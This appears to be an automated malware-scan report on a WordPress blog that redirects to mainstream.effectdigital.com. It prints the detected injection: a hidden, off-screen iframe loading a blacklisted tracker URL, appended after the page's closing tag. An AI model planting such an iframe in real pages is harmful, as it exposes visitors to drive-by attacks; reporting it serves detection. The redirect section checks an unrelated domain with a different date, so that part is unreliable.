Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=blog.mainstreampartnership.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ww2.comcastbenifits.com
Result:
HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 25 Jan 2015 13:26:37 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 3541
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=102
...3541 bytes of data.
GET / HTTP/1.1
Host: ww2.comcastbenifits.com
Result:
HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 25 Jan 2015 13:26:37 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 3541
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=102
...3541 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ww2.comcastbenifits.com
Referer: http://www.google.com/search?q=ww2.comcastbenifits.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ww2.comcastbenifits.com
Referer: http://www.google.com/search?q=ww2.comcastbenifits.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://blog.mainstreampartnership.co.uk/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 17 May 2014 06:33:01 GMT Location: http://mainstream.effectdigital.com/ Server: Apache Content-Length: 326 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://mainstream.effectdigital.com/ | 200 OK Content-Length: 28753 Content-Type: text/html | malicious |
Page code contains blacklisted domain: adv-inc-net.com ...[33699 bytes skipped]... v> <p class="previous-posts"></p> <p class="next-posts"><a href="http://mainstream.effectdigital.com/?paged=2" >Older posts >></a></p> </div> </div> <!-- footer template --> <div id="appendix" class="clearfix"> </div> </div> <!-- wp_footer --> </body> </html> <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> Malicious iFrame found. size: 640x480 src: http://adv-inc-net.com/trackingcode/tracker.html This URL is marked by Google as suspicious <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://mainstream.effectdigital.com/wp-content/themes/jq/lib/js/jquery.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://mainstream.effectdigital.com/wp-content/themes/jq/lib/js/superfish.js | 200 OK Content-Length: 3716 Content-Type: text/javascript | clean |
http://mainstream.effectdigital.com/wp-content/themes/jq/lib/js/supersubs.js | 200 OK Content-Length: 3299 Content-Type: text/javascript | clean |
http://mainstream.effectdigital.com/wp-content/themes/jq/lib/js/cookies.js | 200 OK Content-Length: 4341 Content-Type: text/javascript | clean |
http://mainstream.effectdigital.com/wp-content/themes/jq/lib/js/fontResizer.js | 200 OK Content-Length: 1510 Content-Type: text/javascript | clean |
http://mainstream.effectdigital.com/wp-content/themes/jq/lib/js/theme.js | 200 OK Content-Length: 1075 Content-Type: text/javascript | clean |
http://blog.mainstreampartnership.co.uk/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 17 May 2014 06:33:08 GMT Location: http://mainstream.effectdigital.com/test404page.js Server: Apache Content-Length: 340 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://mainstream.effectdigital.com/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |